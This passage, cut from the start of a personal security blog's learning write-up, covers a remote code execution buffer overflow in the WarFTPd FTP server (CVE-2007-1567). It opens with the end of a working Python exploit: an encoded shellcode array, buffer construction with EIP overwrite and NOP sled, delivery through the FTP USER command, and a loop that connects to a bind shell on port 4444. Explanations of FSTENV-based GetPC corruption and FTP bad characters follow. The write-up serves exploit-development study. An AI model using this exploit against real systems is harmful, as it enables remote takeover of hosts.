class="hljs-string">b&quot;\x18\xa3\x3b\x7e\x42\x72\xf6\xaa\xf2\xcf\x3f&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x4b\x44\xcc\xab\xbc\x8c\xa5\xca\x90\x71\xbc&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x49\x39\x72\xd4\x84\xeb\x8f\xfa\x0b\x78\xe1&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x42\x43\x34\x28\xf9\x5f\x9d\xdb\xfd\x25\x9e&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x08\x8f\x8d\xcd\x4d\x80\x04\x67\xec\x47\x53&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xd3\x41\x45\x21\x08\x27\x99\xde\xd1\xbe\x96&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x3d\x8c\xa6\x6b\xde\x14\x36\xaa\x71\xb9\xa1&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xc5\x5d\xcb\x0c\xc5\x8d\xa0\x16\x90\xf0\x73&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x82\x51\x67\x55\x50\x82\x10\xeb\xa0\x5f\x28&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xaf\xca\x4f\x6f\x18\x33\x22\x1e\x96\xd9\x96&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x2e\x83\xd5\xcc\xfb\xb0\xd5\x51\x04\x98\xfe&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xb0\x6d\xd9\xa1\x8a\x3a\x54\x9d\x5a\x88\xda&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xea\x5f\x25\x6c\xe8\x2c\x68\xfe\x2f\xca\x95&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xf9\x11\x70\xe0\x4f\xaa\xfe\x80\x13\xa5\xa5&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xbf\x45\x4c\x82\xd0\x10\x72\xe1\x4e\x1e\x12&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x03\x5f\x65\x18\xa8\xae\x5a\xfd\x99\x13\x85&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x9c\xfc\x4d\x69\x2e\xea\x90\x2d\xa6\xef\xbb&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x29\xa3\x9e\xf0\x38\xfd\x9f\xbf\xa6\xd4\x32&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xb8\x06\x4a\x0e\xf6\x7a\x93\x86\xaf\x5a\x4f&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xcd\x32\xb9\x46\x17\xc0\x7f\x70\x24\x5a\x8f&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x39\xf7\xe4\xe5\x77\xec\xb6\xfe\x17\x7e\x0f&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x5a\x93\x14\xf5\xee\x66\xed\x5d\x96\x11\x41&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x4f\x42\x9d\x5b\x82\xdd\xb4\x26\xad\x90\xf1&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xc3\xff\x75\xeb\xbc\xf8\x87\x3f\xe7\xa2\xaa&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x63\xbf\x14\x06\x0e\x5d\xa6\x8f\x25\x68\x7e&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xba\xae\x06\xc8\x02\x39\x57\x29\xf2\x99\xdd&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x8b\x69\x24\xaa\xd8\x7f\xd2\xbb\x4c\x44\x06&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x38\x27\x8c\x80\x1f\x83\x71\x1f\x84\xc4\x8d&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xd4\xad\x9c\xa2\x53\x70\x0e\xe2\xaf\x5d\x8f&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x53\x7d\x8c\x08\x8b\x45\x54\xe7\x03\xda\x44&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xe9\xcc\x5f\x4d\x2b\xaa\x3a\x2e\xf7\x24\x04&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x06\xa0\x08\x99\x74\x55\xd9\x01\x8e\x08\xcf&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x93\x58&quot;</span><br><br>buffer = <span class="hljs-string">b&#x27;&#x27;</span><br>buffer += junk<br>buffer += eip<br>buffer += nopsled<br><span class="hljs-comment"># buffer += int3</span><br>buffer += shellcode<br><br>payload = <span class="hljs-string">b&#x27;USER &#x27;</span> + buffer + <span class="hljs-string">b&#x27;\r\n&#x27;</span><br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Sending WarFTPd payload...&quot;</span>)<br>s.sendall(payload)<br>s.close()<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Payload has been sent&quot;</span>)<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Waiting for shell to bind and connecting...&quot;</span>)<br><br>shell_sock = <span class="hljs-literal">None</span><br><br><span class="hljs-comment"># You can use netcat instead</span><br><span class="hljs-keyword">for</span> attempt <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10</span>): <span class="hljs-comment"># retry</span><br>    <span class="hljs-keyword">try</span>:<br>        time.sleep(<span class="hljs-number">1</span>)<br>        shell_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>        shell_sock.settimeout(<span class="hljs-number">3</span>)<br>        shell_sock.connect((SERVER_IP, <span class="hljs-number">4444</span>))<br>        shell_sock.settimeout(<span class="hljs-literal">None</span>)<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;\n[+] Pwned!\n&quot;</span>)<br>        <span class="hljs-keyword">break</span><br>    <span class="hljs-keyword">except</span> (socket.error, socket.timeout):<br>        <span class="hljs-keyword">if</span> shell_sock:<br>            shell_sock.close()<br>        shell_sock = <span class="hljs-literal">None</span><br>        sys.stdout.write(<span class="hljs-string">&quot;.&quot;</span>)<br>        sys.stdout.flush()<br><br><span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> shell_sock:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[-] Connection failed: Max retries reached.&quot;</span>)<br>    sys.exit(<span class="hljs-number">1</span>)<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+] Interactive shell spawned below:\n&quot;</span>)<br><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    read_list = [sys.stdin, shell_sock]<br>    read_sockets, _, _ = select.select(read_list, [], [])<br><br>    <span class="hljs-keyword">if</span> sys.stdin <span class="hljs-keyword">in</span> read_sockets:<br>        line = sys.stdin.readline()<br>        <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> line:<br>            <span class="hljs-keyword">break</span><br>        shell_sock.sendall(line.encode())<br><br>    <span class="hljs-keyword">if</span> shell_sock <span class="hljs-keyword">in</span> read_sockets:<br>        data = shell_sock.recv(<span class="hljs-number">1024</span>)<br>        <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> data:<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;\n[-] Connection closed by target.&quot;</span>)<br>            <span class="hljs-keyword">break</span><br>        sys.stdout.write(data.decode(errors=<span class="hljs-string">&#x27;ignore&#x27;</span>))<br>        sys.stdout.flush()<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/17.png'><img src="/images/article/2026-9-8-WarFTP-BOF/17.png" width=700/>
</p>

<h1 id="The-Devil-Is-In-the-Detail"><a href="#The-Devil-Is-In-the-Detail" class="headerlink" title="The Devil Is In the Detail!"></a>The Devil Is In the Detail!</h1><p>Before writing this article, I thought exploiting a legacy application would be easy since I had been studying buffer overflow for a while. However, I soon found out that it was much more difficult than I had expected, and I spent much more time on it than I originally anticipated. Therefore, I decided to document the issues I encountered.</p>
<p>The problem was in the exploit chain. The NOP sled I used previously was:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">nopsled = <span class="hljs-string">b&#x27;\x90&#x27;</span> * <span class="hljs-number">4</span><br></code></pre></td></tr></table></figure>
<p>After running the script, nothing happened. <code>calc.exe</code> did not appear. I spent hours investigating bad characters and changing the encoder I was using, but none of them worked.</p>
<p align="center" class='item-img' data-src='/images/meme/Rio/2.png'><img src="/images/meme/Rio/2.png" width=250/>
</p>

<p>So, I changed the shellcode to the following in order to debug it in Immunity Debugger:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python">int3 = <span class="hljs-string">&#x27;\xcc&#x27;</span> <span class="hljs-comment"># INT3</span><br><br>buffer = <span class="hljs-string">b&#x27;&#x27;</span><br>buffer += junk<br>buffer += eip<br>buffer += nopsled<br>buffer += int3<br>buffer += shellcode<br></code></pre></td></tr></table></figure>
<p>The assembly code at the beginning is shown below:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/18.png'><img src="/images/article/2026-9-8-WarFTP-BOF/18.png" width=700/>
</p>

<p>After executing <code>FSTENV</code>, the surrounding assembly code was corrupted:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/19.png'><img src="/images/article/2026-9-8-WarFTP-BOF/19.png" width=700/>
</p>

<p>Then, I increased the size of the NOP sled, and <code>calc.exe</code> appeared:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">nopsled = <span class="hljs-string">b&#x27;\x90&#x27;</span> * <span class="hljs-number">32</span><br></code></pre></td></tr></table></figure>
<p>In the x86 architecture, tHere, Is no direct instruction such as <code>MOV EAX, EIP</code> for querying the current instruction pointer. When the <code>JMP ESP</code> instruction redirects execution to our shellcode, the payload has no direct way to determine wHere, It is physically located in memory.</p>
<p>To decode itself on the fly, encoded shellcode must first determine its own memory address using a technique called <strong>GetPC (Get Program Counter)</strong>.</p>
<p>A common way to achieve this is by leveraging the <strong>x87 Floating-Point Unit (FPU)</strong>:</p>
<ul>
<li>The CPU records the memory address of the last executed floating-point instruction inside the FPU state.</li>
<li><code>FSTENV</code> (Store FPU Environment) instruction stores a 28-byte structure containing FPU state, including the saved instruction pointer, to a memory location.</li>
</ul>
<blockquote>
<p>Note: The name x87 comes from the naming convention of the original, separate hardware chips that Intel created to handle floating-point arithmetic for its early x86 processors.</p>
</blockquote>
<p>The <code>FSTENV</code> does not simply read a register; it writes 28 bytes to memory, typically using an address relative to the current stack pointer (<code>ESP</code> or <code>ESP - 0xC</code>).</p>
<p>When the shellcode executed <code>JMP ESP</code>, the stack pointer pointed directly to the beginning of the payload. When the NOP sled was only 4 bytes long (<code>nopsled = b&#39;\x90&#39; * 4</code>), the sequence of events looked like this:</p>
<ol>
<li>Execution jumped directly into the NOP sled and reached the decoder stub.</li>
<li>The decoder executed <code>FSTENV</code> instruction to determine its location.</li>
<li><code>FSTENV</code> immediately wrote a 28-byte block containing the FPU state, including fields that may contain null bytes such as <code>0x00</code>, onto the stack.</li>
<li>Because the NOP sled was only 4 bytes long, the 28-byte data overwrote part of the payload, including the decoder code.</li>
<li>The decoder was corrupted and turned into random or invalid bytes, such as <code>00 00</code>.</li>
<li>The CPU then attempted to execute the corrupted memory, resulting in an immediate Access Violation.</li>
</ol>
<p>To solve this problem, we simply need to increase the size of the NOP sled.</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/20.png'><img src="/images/article/2026-9-8-WarFTP-BOF/20.png" width=700/>
</p>

<p>Another problem was the bad characters, which also annoyed me for hours…</p>
<p align="center" class='item-img' data-src='/images/meme/Rio/7.png'><img src="/images/meme/Rio/7.png" width=250/>
</p>

<p>Conventionally, only <code>\x00</code> (Null Byte) is considered a bad character. In FTP, however, the characters shown below can also cause problems:</p>
<ul>
<li><strong><code>\x0a</code> (LF) and <code>\x0d</code>(CR)</strong>: These represent Line Feed (<code>\n</code>) and Carriage Return (<code>\r</code>), which are used as line terminators in FTP commands. When the FTP server encounters these characters, it may interpret them as the end of the current command. Any shellcode following them may therefore be ignored, split, or interpreted as a new command.</li>
<li><strong><code>\x09</code> (Tab) and <code>\x20</code> (Space)</strong>: These act as delimiters and whitespace. FTP servers parse commands by separating the command and its arguments using whitespace. For example, when parsing <code>USER &lt;username&gt;</code>, a space separates the command from the username. If your shellcode contains spaces or tabs, the server’s command parser may misinterpret them as argument separators, fragmenting or corrupting your payload.</li>
<li><strong><code>\x40</code> (‘@’)</strong>: This is a special character that may trigger parsing or rewriting logic in some legacy FTP servers or authentication routines, such as those supporting <code>username@hostname</code> formats. In the specific context of the WarFTP buffer overflow, empirical testing shows that <code>@</code> corrupts the input stream and must therefore be avoided.</li>
</ul>
<h1 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h1><p>In this article, I introduced and demonstrated how to exploit <code>CVE-2007-1567</code>, a remote code execution vulnerability in WarFTP caused by a buffer overflow.</p>
<p>In addition, I introduced several important issues that can arise when writing shellcode.</p>
<p>These experiences highlight why people often describe shellcoding as sophisticated black magic: it is not only powerful, but also involves many subtle details that cannot be ignored!</p>
<p>This is the end of this article. If you have any suggestions or comments, please feel free to leave them below!</p>
<h1 id="THANKS-FOR-READING"><a href="#THANKS-FOR-READING" class="headerlink" title="THANKS FOR READING"></a>THANKS FOR READING</h1><p align="center" class='item-img' data-src='/images/meme/Wallpaper/Shiroko_ShootingStar.png'><img src="/images/meme/Wallpaper/Shiroko_ShootingStar.png" width=700/>
</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2026/09/09/2026-9-9-Minishare-BOF/">← Next [Learning] CVE-2004-2271: MiniSHare v1.4.1 RCE — Buffer Overflow</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2026/09/05/2026-9-5-OpenPetya2-0-0/">[Learning] OpenPetya v2.0.0: An UEFI Bootkit Prev →</a></div></div></div><div id="comments"><div class="selector"><button class="utterances-sel"></button></div><div id="utterances-container"></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a target="_blank" rel="noopener" href="https://github.com/iss4cf0ng/" width="200" id="logo"><img src="https://avatars.githubusercontent.com/u/110074064?v=4" alt="Logo"></a><h1 id="Dr"><a href="/">ISSAC</a></h1><div id="description"><p>Everything is failing...</p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/iss4cf0ng/"><i class="fab fa-github" alt="GitHub"></i></a><a class="social" target="_blank" rel="noopener" href="https://x.com/iss4c_f0ng/"><i class="fab fa-twitter" alt="X"></i></a></div><div id="rss-feed"><a class="social" id="rss-copy-button" href="javascript:void(0)" title="Copy RSS link to clipboard"><span>RSS</span></a></div></div><div id="music"></div><div class="music-box"><hr style="border:1px solid #ccc; margin:10px 0"><p class="music-title">Feeling exhausted? Let's enjoy (やさしい) music!</p><p style="text-align:center; position: relative"><img class="music-anime" id="anime-img" src="/images/meme/himari_coffee.2.jpg" width="150" height="200"></p><div style="text-align:center"><button class="music-btn" id="music-prev">⏮</button><button class="music-btn" id="music-toggle">▶ Play Music</button><button class="music-btn" id="music-next">⏭</button></div><div style="margin-top:5px"><span id="music-index"></span></div><hr style="border:1px solid #ccc; margin:10px 0"><audio id="bg-music"><source src="/mp3/music/music_1.mp3" type="audio/mpeg"></audio><script>document.addEventListener("DOMContentLoaded", function () {
  var playlist = [
    "/mp3/music/music_1.mp3",
    "/mp3/music/sugar_story.mp3",
    "/mp3/music/story_music_box.mp3",
    "/mp3/music/last_page.mp3",
    "/mp3/music/sunset_memory.mp3",
    "/mp3/music/welcome_home.mp3",
    "/mp3/music/canon.mp3",
    "/mp3/music/arigadou.mp3",
  ];

  var current = 0;
  const audio = document.getElementById("bg-music");
  const btn = document.getElementById("music-toggle");
  const prevBtn = document.getElementById("music-prev");
  const nextBtn = document.getElementById("music-next");
  const indexDisplay = document.getElementById("music-index");

  function updateDisplay() {
    indexDisplay.innerText = `Currently: ${current + 1} / ${playlist.length}`;
  }

  updateDisplay();

  btn.addEventListener("click", function () {
    if (audio.paused) {
      audio.src = playlist[current];
      audio.play();
      btn.innerText = "⏸ Pause Music";
    } else {
      audio.pause();
      btn.innerText = "▶ Play Music";
    }
  });

  nextBtn.addEventListener("click", function () {
    const wasPlaying = !audio.paused;

    current = (current + 1) % playlist.length;

    audio.src = playlist[current];
    audio.load();

    if (wasPlaying) {
      audio.play();
    }

    updateDisplay();
  });

  prevBtn.addEventListener("click", function () {
    const wasPlaying = !audio.paused;

    current--;

    if (current < 0)
      current = playlist.length - 1;

    audio.src = playlist[current];
    audio.load();

    if (wasPlaying) {
      audio.play();
    }

    updateDisplay();
  });

  audio.addEventListener("ended", function() {
    current = (current + 1) % playlist.length;
    audio.src = playlist[current];
    audio.play();
    updateDisplay();
  });
});
</script><script>document.addEventListener("DOMContentLoaded", function () {
  const animeImg = document.getElementById("anime-img");

  animeImg.addEventListener("click", function() {
    
    const tip = document.createElement("div");
    tip.innerText = "?";
    tip.style.position = "absolute";
    tip.style.top = "-50px";
    tip.style.left = "50%";
    tip.style.transform = "translateX(-50%)";
    tip.style.backgroundColor = "#fff";
    tip.style.color = "rgb(16, 174, 11)";
    tip.style.padding = "2px 6px";
    tip.style.border = "1px solid #ccc";
    tip.style.borderRadius = "8px";
    tip.style.boxShadow = "0 3px 6px rgba(0,0,0,0.2)";
    tip.style.fontSize = "50px";
    tip.style.fontWeight = "bold";
    tip.style.zIndex = "1000";
    tip.style.opacity = "1";
    tip.style.transition = "opacity 1s, top 1s";
    
    animeImg.parentElement.appendChild(tip);

    setTimeout(() => {
      tip.style.opacity = "0";
      tip.style.top = "-60px";
      setTimeout(() => tip.remove(), 1000);
    }, 2000);
  });
});
</script><script>document.addEventListener("DOMContentLoaded", function () {
  const rssBtn = document.getElementById("rss-copy-button");

  rssBtn.addEventListener("click", async () => {
    const rssUrl = window.location.origin + "/atom.xml";
    try {
      await navigator.clipboard.writeText(rssUrl);

      const tip = document.createElement("div");
      tip.innerText = "RSS link copied!";
      tip.style.position = "absolute";
      tip.style.top = "-30px";
      tip.style.left = "50%";
      tip.style.transform = "translateX(-50%)";
      tip.style.backgroundColor = "#0d0d0d";
      tip.style.color = "#00fff7";
      tip.style.border = "1px solid #ff00ff";
      tip.style.boxShadow = "0 0 8px #ff00ff, 0 0 16px #00fff7";
      tip.style.padding = "2px 6px";
      tip.style.borderRadius = "8px";
      tip.style.fontSize = "14px";
      tip.style.fontWeight = "bold";
      tip.style.zIndex = "1000";
      tip.style.opacity = "1";
      tip.style.transition = "opacity 1s, top 1s";

      rssBtn.style.position = "relative";
      rssBtn.appendChild(tip);

      setTimeout(() => {
        tip.style.opacity = "0";
        tip.style.top = "-40px";
        setTimeout(() => tip.remove(), 1000);
      }, 2000);

    } catch (err) {
      console.error("Failed to copy: ", err);
    }
  });
});
</script></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Preface"><span class="toc-number">1.</span> <span class="toc-text">Preface</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Introduction"><span class="toc-number">2.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Environment-Setup"><span class="toc-number">3.</span> <span class="toc-text">Environment Setup</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Buffer-Overflow"><span class="toc-number">4.</span> <span class="toc-text">Buffer Overflow</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#The-Devil-Is-In-the-Detail"><span class="toc-number">5.</span> <span class="toc-text">The Devil Is In the Detail!</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Conclusion"><span class="toc-number">6.</span> <span class="toc-text">Conclusion</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#THANKS-FOR-READING"><span class="toc-number">7.</span> <span class="toc-text">THANKS FOR READING</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/custom.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script src="/js/slide.js"></script></body></html>